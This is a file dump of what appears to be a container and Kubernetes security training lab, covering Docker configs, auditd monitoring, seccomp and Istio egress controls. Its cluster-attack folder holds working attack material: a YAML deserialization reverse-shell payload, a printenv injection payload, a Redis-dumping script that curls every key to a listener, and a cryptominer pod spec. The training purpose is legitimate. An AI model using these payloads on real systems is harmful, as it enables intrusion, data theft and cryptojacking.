 9 |      - "8228:8228"
10 |      - "8338:8338"
11 |     volumes:
12 |      - /anchore_config:/config/:z
13 |     logging:
14 |      driver: "json-file"
15 |      options:
16 |       max-size: 100m
17 |     environment:
18 |      # NOTE: this should be set to the same name as this service (e.g. anchore-engine)
19 |      - ANCHORE_HOST_ID=dockerhostid-anchore-engine
20 |      - ANCHORE_ENDPOINT_HOSTNAME=anchore-engine
21 |   anchore-db:
22 |     image: "postgres:9"
23 |     volumes:
24 |      - /anchore_db:/var/lib/postgresql/data/pgdata/:z
25 |     environment:
26 |       - POSTGRES_PASSWORD=mysecretpassword
27 |       - PGDATA=/var/lib/postgresql/data/pgdata/
28 |     logging:
29 |      driver: "json-file"
30 |      options:
31 |       max-size: 100m
32 |     #uncomment to expose a port to allow direct/external access to the DB, for debugging
33 |     #ports:
34 |     # - "2345:5432"


--------------------------------------------------------------------------------
/Container/extra/container/Anchore/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Anchore/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Authentication-Attacks-against-Host/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Authentication-Attacks-against-Host/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Container-Orchestrators/Docker-Compose/conf.d/app.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen 80;
 3 |     server_name localhost;
 4 | 
 5 |     location / {
 6 |         proxy_set_header   Host                 $host;
 7 |         proxy_set_header   X-Real-IP            $remote_addr;
 8 |         proxy_set_header   X-Forwarded-For      $proxy_add_x_forwarded_for;
 9 |         proxy_set_header   X-Forwarded-Proto    $scheme;
10 |         proxy_set_header Host $http_host;
11 | 
12 |         proxy_pass http://helloworld:5000;
13 |     }
14 | }


--------------------------------------------------------------------------------
/Container/extra/container/Container-Orchestrators/Docker-Compose/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3"
 2 | services:
 3 |   helloworld:
 4 |     image: helloworld:latest
 5 |     expose:
 6 |     - "5000"
 7 |   nginx:
 8 |     image: nginx:latest
 9 |     ports:
10 |       - "80:80"
11 |     volumes:
12 |       - ./conf.d:/etc/nginx/conf.d
13 |     depends_on:
14 |       - helloworld
15 | 


--------------------------------------------------------------------------------
/Container/extra/container/Container-Orchestrators/Docker-Compose/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Container-Orchestrators/Docker-Compose/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Container-Orchestrators/Docker-Compose/img/app-status.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Container-Orchestrators/Docker-Compose/img/app-status.png


--------------------------------------------------------------------------------
/Container/extra/container/Container-Orchestrators/README.md:
--------------------------------------------------------------------------------
1 | # [Container Orchestrators](README.me)
2 | 
3 | 
4 | * ##### [Docker Compose](Docker-Compose/README.md)
5 | 


--------------------------------------------------------------------------------
/Container/extra/container/Dagda/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Dagda/img/cd-path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/cd-path.png


--------------------------------------------------------------------------------
/Container/extra/container/Dagda/img/dagda-db.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/dagda-db.png


--------------------------------------------------------------------------------
/Container/extra/container/Dagda/img/env1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/env1.png


--------------------------------------------------------------------------------
/Container/extra/container/Dagda/img/env2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Dagda/img/env2.png


--------------------------------------------------------------------------------
/Container/extra/container/Denial-of-Service/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Denial-of-Service/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Daemon-Direct-Access/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-exec.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-exec.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-ps.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-ps.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-rm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-rm.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-run.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-stop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Daemon-Direct-Access/img/docker-stop.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Monitoring/README.md:
--------------------------------------------------------------------------------
 1 | ## Auditd for Docker monitoring
 2 | 
 3 | 
 4 | #####Step 1:
 5 |  * Run `service auditd status` to check if `auditd` service is running. If the service is not runninig, run `service auditd start`.
 6 | 
 7 | 
 8 | ![](img/auditd-1.png)
 9 | 
10 | 
11 | #####Step 2:
12 | * Create an audit rule to watch for Read, Write, Execute and Attribute changes on `docker-daemon` logging them to a logfile by appending
13 | docker-daemon label at end of each log-entry to make logs easier to query. This can be done by running:
14 |     
15 |     `auditctl -w /usr/bin/docker -p rwxa -k docker-daemon`
16 |     
17 |     * auditctl is for temporary use till system is shutdown. For a more permanent approach, add rule in rules.d/ and run 'augenriles --check'. 
18 |       If there's a difference, run 'augenrules --load' to load the new rules 
19 | 
20 | 
21 | ![](img/auditd-2.png)
22 | 
23 | 
24 | #####Step 3:
25 | * Create, Launch, Run and Stop a few containers for Auditd to log.
26 | 
27 | ![](img/auditd-3.png)
28 | 
29 |    
30 | #####Step 4:
31 | * To search logs based on the label given(`docker-daemon`), run `ausearch -k docker-daemon`.
32 | 
33 | ![](img/auditd-4.png)
34 | 
35 |     
36 | #####Step 5:
37 | * For a count of executable events run on system that day, run `ausearch --start today --raw | aureport -x --summary`
38 | 
39 | ![](img/auditd-5.png)
40 | 


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Monitoring/img/auditd-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-1.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Monitoring/img/auditd-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-2.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Monitoring/img/auditd-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-3.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Monitoring/img/auditd-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-4.png


--------------------------------------------------------------------------------
/Container/extra/container/Docker-Monitoring/img/auditd-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Docker-Monitoring/img/auditd-5.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-1.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-2.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-3.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-4.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-5.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-6.png


--------------------------------------------------------------------------------
/Container/extra/container/Network-Namespace/img/netns-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Network-Namespace/img/netns-7.png


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/README.md:
--------------------------------------------------------------------------------
 1 | # Union Mount FileSystem
 2 | 
 3 | ---
 4 | 
 5 | ## Please Note: This might not work on VM
 6 | 
 7 | 
 8 | #### Step 1: Create Three Folders named `Folder-1`,  `Folder-2` and `mnt`
 9 | 
10 |     mkdir Folder-1 Folder-2 mnt
11 | 
12 | ![](img/ufs-1.png)
13 | 
14 | 
15 | #### Step 2: Create sub-directories and files in `Folder-1` and `Folder-2`
16 | 
17 |     mkdir -p Folder-1/Dir1 Folder-2/Dir1 Folder-2/Dir2
18 |     
19 |     touch Folder-1/File1.txt Folder-1/Dir1/dir1.txt Folder-1/Dir1/one.txt
20 |     
21 |     touch Folder-2/Dir1/file2.txt Folder-2/Dir1/two.txt Folder-2/Dir2/dir2_file.txt Folder-2/File2.txt
22 | 
23 | ![](img/ufs-2.png)
24 | 
25 |         
26 | #### Step 3: Check the structure of directories that have been created
27 | 
28 |     tree .
29 | 
30 | ![](img/ufs-3.png)
31 | 
32 |         
33 | #### Step 4: Run `unionfs-fuse -o dirs=Folder-1:Folder-2  mnt/` . The directories and files in `Folder-1` and `Folder-2` will be mounted on `mnt`
34 | 
35 |     unionfs-fuse -o dirs=Folder-1:Folder-2  mnt/
36 | 
37 | ![](img/ufs-4.png)
38 |         
39 | 
40 | #### Step 5: Check the structure of `mnt/` 
41 | 
42 |     tree mnt
43 | 
44 | ![](img/ufs-5.png)
45 | 
46 |         
47 | #### Step 6: To unmount, run `umount -l mnt`
48 | 
49 |     umount -l mnt
50 | 
51 | ![](img/ufs-6.png)
52 | 
53 | 


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/img/ufs-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-1.png


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/img/ufs-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-2.png


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/img/ufs-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-3.png


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/img/ufs-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-4.png


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/img/ufs-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-5.png


--------------------------------------------------------------------------------
/Container/extra/container/Union-Mount-File-System/img/ufs-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Union-Mount-File-System/img/ufs-6.png


--------------------------------------------------------------------------------
/Container/extra/container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/Vulnerable-Libraries-ShellShock/img/defaced.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Vulnerable-Libraries-ShellShock/img/defaced.png


--------------------------------------------------------------------------------
/Container/extra/container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png


--------------------------------------------------------------------------------
/Container/extra/container/dlayer/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Container/extra/container/dlayer/img/dlayer-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/dlayer-1.png


--------------------------------------------------------------------------------
/Container/extra/container/dlayer/img/dlayer-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/dlayer-2.png


--------------------------------------------------------------------------------
/Container/extra/container/dlayer/img/docker-images-list.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/dlayer/img/docker-images-list.png


--------------------------------------------------------------------------------
/Container/seccomp/README.md:
--------------------------------------------------------------------------------
1 | ## SECCOMP Profiles for Docker Containers
2 | 
3 | * cd into <directory> with `cd <directory>`
4 | 
5 | * Run `docker run -it --rm --security-opt seccomp:custom_profile.json alpine chmod 400 /etc/hostname`
6 | 
7 | * Observe the results


--------------------------------------------------------------------------------
/Container/seccomp/custom_profile.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "defaultAction": "SCMP_ACT_ALLOW",
 3 |     "architectures": [
 4 |         "SCMP_ARCH_X86_64",
 5 |         "SCMP_ARCH_X86",
 6 |         "SCMP_ARCH_X32"
 7 |     ],
 8 |     "syscalls": [
 9 |         {
10 |             "name": "chmod",
11 |             "action": "SCMP_ACT_ERRNO",
12 |             "args": []
13 |         },
14 |         {
15 |             "name": "chown",
16 |             "action": "SCMP_ACT_ERRNO",
17 |             "args": []
18 |         },
19 |         {
20 |             "name": "chown32",
21 |             "action": "SCMP_ACT_ERRNO",
22 |             "args": []
23 |         }
24 | 
25 |     ]
26 | }


--------------------------------------------------------------------------------
/Kubernetes/Initial-Setup/README.md:
--------------------------------------------------------------------------------
 1 | # Steps to run before starting Labs
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Update the Labs
 6 | 
 7 | ```bash
 8 | cd /root/container_training/
 9 | 
10 | git pull
11 | ```
12 | 


--------------------------------------------------------------------------------
/Kubernetes/Initial-Setup/install_script.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | echo "This is for ubuntu:16.04(Xenial). Run as root user!"
 4 | apt update && apt -y upgrade
 5 | apt install -y curl wget apt-transport-https docker.io unzip httpie openssl golang-go jq htop
 6 | curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
 7 | echo "deb http://apt.kubernetes.io/ kubernetes-xenial main" >> /etc/apt/sources.list.d/kubernetes.list
 8 | apt update && apt install -y kubelet=1.10.3-00 kubeadm=1.10.3-00 kubectl=1.10.3-00 kubernetes-cni
 9 | wget https://bootstrap.pypa.io/get-pip.py && python get-pip.py && rm get-pip.py && pip install netaddr netifaces enum34 scapy requests PrettyTable urllib3 ruamel.yaml tornado
10 | git clone https://github.com/we45/container_training.git
11 | wget https://releases.hashicorp.com/vault/1.0.1/vault_1.0.1_linux_amd64.zip && unzip vault_1.0.1_linux_amd64.zip && mv vault /usr/local/bin && rm vault_1.0.1_linux_amd64.zip
12 | wget -O /usr/local/bin/kubeseal https://github.com/bitnami-labs/sealed-secrets/releases/download/v0.7.0/kubeseal-linux-amd64 && chmod +x /usr/local/bin/kubeseal
13 | echo "curl -XGET https://www.canihazip.com/s" >> /usr/local/bin/serverip && echo "echo ''" >> /usr/local/bin/serverip && chmod +x /usr/local/bin/serverip
14 | 


--------------------------------------------------------------------------------
/Kubernetes/Istio/README.md:
--------------------------------------------------------------------------------
 1 | # Istio for Network Security Policies
 2 | 
 3 | ## Objective
 4 | 
 5 | * In the K8s Attack exercies, RCE could have been prevented if `reverse shell` was blocked by Network Security controls
 6 | 
 7 | * Istio by default blocks `egress`. 
 8 | 
 9 | ##### Step 1:
10 | 
11 | * Navigate to the istio directory
12 | 
13 | ```commandline
14 | cd /root/container_training/Kubernetes/Istio
15 | ```
16 | 
17 | * Download the installation file
18 | 
19 | ```
20 | curl -L https://git.io/getLatestIstio | sh -
21 | ```
22 | 
23 | * Navigate to the installation directory
24 | 
25 | ```
26 | ls
27 | 
28 | cd istio-1.x.x
29 | ```
30 | 
31 | ##### Step 2:
32 | 
33 | * Install Istio without mutual TLS authentication between sidecars
34 | 
35 | ```
36 | kubectl apply -f install/kubernetes/istio-demo.yaml
37 | ```
38 | 
39 | * Verify the installation
40 | 
41 | ```
42 | kubectl get svc -n istio-system
43 | 
44 | kubectl get pods -n istio-system
45 | ```
46 | 
47 | ##### Step 3:
48 | 
49 | * Apply automatic sidecar injection to the `default` namespace
50 | 
51 | ```
52 | kubectl label namespace default istio-injection=enabled
53 | ```
54 | 
55 | ##### Step 4:
56 | 
57 | * Navigate to `K8s-Cluster-Attack` and try to run the exercise again
58 | 
59 | * Observe the results
60 | 
61 | 
62 | ##### Step 5:
63 | 
64 | * Stop istio
65 | 
66 | ```
67 | kubectl delete -f install/kubernetes/istio-demo.yaml
68 | 
69 | kubectl label namespace default istio-injection-
70 | ```
71 | 


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/K8s-Cluster-Attack/__init__.py


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/malicious-redis/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM redis:alpine
 2 | 
 3 | ENV CLIENTPORT 6379
 4 | ENV MASTERPORT 6379
 5 | ENV MASTERHOST 192.168.122.1
 6 | ENV CLIENTHOST 0.0.0.0
 7 | ENV APPENDFSYNC=everysec
 8 | ENV LISTENER_IP 192.168.122.1
 9 | ENV LISTENER_PORT 9080
10 | 
11 | ADD redis.conf /etc/redis.conf
12 | RUN chown redis:redis /etc/redis.conf
13 | RUN apk add curl
14 | COPY post_db.sh /
15 | RUN chmod +x /post_db.sh
16 | EXPOSE $CLIENTPORT
17 | 
18 | ADD docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh
19 | ENTRYPOINT ["docker-entrypoint.sh"]
20 | 
21 | CMD [ "redis-server","/etc/redis.conf" ]
22 | 
23 | 


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/malicious-redis/docker-entrypoint.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | set -ex
 3 | 
 4 | ## from redis-3.2
 5 | sed -i "s/bind 127.0.0.1/bind $CLIENTHOST/g" /etc/redis.conf
 6 | 
 7 | ## redis port inside redis.conf
 8 | sed -i "s/port 6379/port $CLIENTPORT/g" /etc/redis.conf
 9 | # sed -i "s/# requirepass foobared/requirepass $REQUIREPASS/g" /etc/redis.conf
10 | # sed -i "s/# masterauth <master-password>/masterauth $REQUIREPASS/g" /etc/redis.conf
11 | 
12 | ## slaveof <masterip> <masterport> => slaveof $MASTERHOST $MASTERPORT
13 | if [ "$MASTERPORT" != "" ];then
14 | 	sed -i "s/# slaveof <masterip> <masterport>/slaveof $MASTERHOST $MASTERPORT/g" /etc/redis.conf
15 | fi
16 | 
17 | ## appendfsync everysec => appendfsync $APPENDFSYNC
18 | if [ "$APPENDFSYNC" != "" ];then
19 | 	sed -i "s/appendonly no/appendonly yes/g" /etc/redis.conf
20 | 	sed -i "s/appendfsync everysec/appendfsync $APPENDFSYNC/g" /etc/redis.conf
21 | fi
22 | 
23 | 
24 | # first arg is `-f` or `--some-option`
25 | # or first arg is `something.conf`
26 | if [ "${1#-}" != "$1" ] || [ "${1%.conf}" != "$1" ]; then
27 | 	set -- redis-server "$@"
28 | fi
29 | 
30 | # allow the container to be started with `--user`
31 | if [ "$1" = 'redis-server' -a "$(id -u)" = '0' ]; then
32 | 	nohup /post_db.sh > /dev/null 2>&1 &
33 | 	chown -R redis .
34 | 	exec su-exec redis "$@"
35 | fi
36 | 
37 | exec "$@"
38 | 


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/malicious-redis/post_db.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | while :; do
 3 |   sleep 10
 4 |   for each in $( redis-cli KEYS \* ); do
 5 |     result=$(redis-cli type $each)
 6 |     value=""
 7 |     if [ $result == "list" ]
 8 |     then
 9 |       value=$(redis-cli lrange $each 0 -1)
10 |     elif [ $result == "string" ]
11 |     then
12 |       value=$(redis-cli get $each)
13 |     elif [ $result == "set" ]
14 |     then
15 |       value=$(redis-cli smembers $each)
16 |     fi
17 |     curl -X POST -H "Content-Type: application/json; charset=UTF-8" -d "{\"key\": \"$each\", \"value\": \"$value\"}" http://$LISTENER_IP:$LISTENER_PORT
18 |     sleep 1
19 |   done
20 |   sleep 10
21 | done
22 | 


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/malicious_pods/cminer.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "kind": "Pod",
 3 |     "apiVersion": "v1",
 4 |     "metadata": {
 5 |         "name": "cmine"
 6 |     },
 7 |     "spec": {
 8 |         "containers": [{
 9 |             "name": "cmine",
10 |             "image": "tseabra/coin-hive",
11 |             "command": ["./coin-hive","Ipf5vWwTX3gO6jd00mm1Wrg3SmNkLk0k"]
12 |         }]
13 |     }
14 | }


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "kind": "Pod",
 3 |     "apiVersion": "v1",
 4 |     "metadata": {
 5 |         "name": "mal-redis"
 6 |     },
 7 |     "spec": {
 8 |         "containers": [{
 9 |             "name": "mal-redis",
10 |             "image": "we45/malicious-redis-slave",
11 |             "env": [
12 |               {
13 |                 "name": "MASTERHOST",
14 |                 "value": "127.0.0.1"
15 |               },
16 |               {
17 |                 "name": "MASTERPORT",
18 |                 "value": "6379"
19 |               },
20 |               {
21 |                 "name": "LISTENER_IP",
22 |                 "value": "192.168.1.5"
23 |               },
24 |               {
25 |                 "name": "LISTENER_PORT",
26 |                 "value": "3999"
27 |               }
28 |             ]
29 |         }]
30 |     }
31 | }


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/ngflask-redis-service.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: ngflask-redis-service
 5 | spec:
 6 |   ports:
 7 |   - port: 80
 8 |     protocol: TCP
 9 |   selector:
10 |     app: ngflask-redis
11 |   type: ClusterIP


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/ngflaskredis-deployment.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: ngflask-redis
 5 |   labels:
 6 |     app: ngflask-redis
 7 | spec:
 8 |   containers:
 9 |     - name: nginx
10 |       image: nginx:1.11
11 |       ports:
12 |       - containerPort: 80
13 |       volumeMounts:
14 |         - mountPath: /etc/nginx/conf.d
15 |           name: config-volume
16 |     - name: redis
17 |       image: redis
18 |       ports:
19 |       - containerPort: 6379
20 |     - name: vulflask-redis
21 |       image: abhaybhargav/vul_flask_redis
22 |       imagePullPolicy: Always
23 |       env:
24 |         - name: REDIS_HOST
25 |           value: 127.0.0.1
26 |       ports:
27 |       - containerPort: 5000
28 |         name: vulflask-port
29 |   volumes:
30 |     - name: config-volume
31 |       configMap:
32 |         name: nginx-config
33 |         items:
34 |         - key: reverseproxy.conf
35 |           path: reverseproxy.conf
36 | 


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/payloads/reverse_shell.yml:
--------------------------------------------------------------------------------
1 | name: PayTM Bill payment 3
2 | reason: !!python/object/apply:os.system ["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"Server_IP_Here\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"]
3 | merchant: Hello World Traders
4 | amount: 12
5 | card: 4111111111111111


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/payloads/test_payment.yml:
--------------------------------------------------------------------------------
1 | name: PayTM Bill payment 5
2 | reason: !!python/object/apply:subprocess.check_output ["printenv"]
3 | merchant: Hello World Traders
4 | amount: 112
5 | card: 5111111111111111


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/redis-service.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: redis-service
 5 | spec:
 6 |   ports:
 7 |   - port: 6379
 8 |     protocol: TCP
 9 |   selector:
10 |     app: ngflask-redis
11 |   type: NodePort


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/reverseproxy.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen  80;
 3 |     server_name localhost;
 4 | 
 5 |     location / {
 6 |         proxy_bind  127.0.0.1;
 7 |         proxy_pass  http://127.0.0.1:5000;
 8 |     }
 9 | 
10 |     error_page  500 502 503 504 /50x.html;
11 |     location = /50x.html {
12 |         root    /usr/share/nginx/html;
13 |     }
14 | }


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/setup_flask_stack.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | kubectl create configmap nginx-config --from-file=reverseproxy.conf
3 | echo "Deploying Vul Flask Nginx Pod"
4 | kubectl create -f ngflaskredis-deployment.yml
5 | sleep 5
6 | echo "Deploying Vul-Flask-Nginx Service"
7 | kubectl create -f ngflask-redis-service.yml
8 | kubectl create -f redis-service.yml


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/setup_insecure_kube.sh:
--------------------------------------------------------------------------------
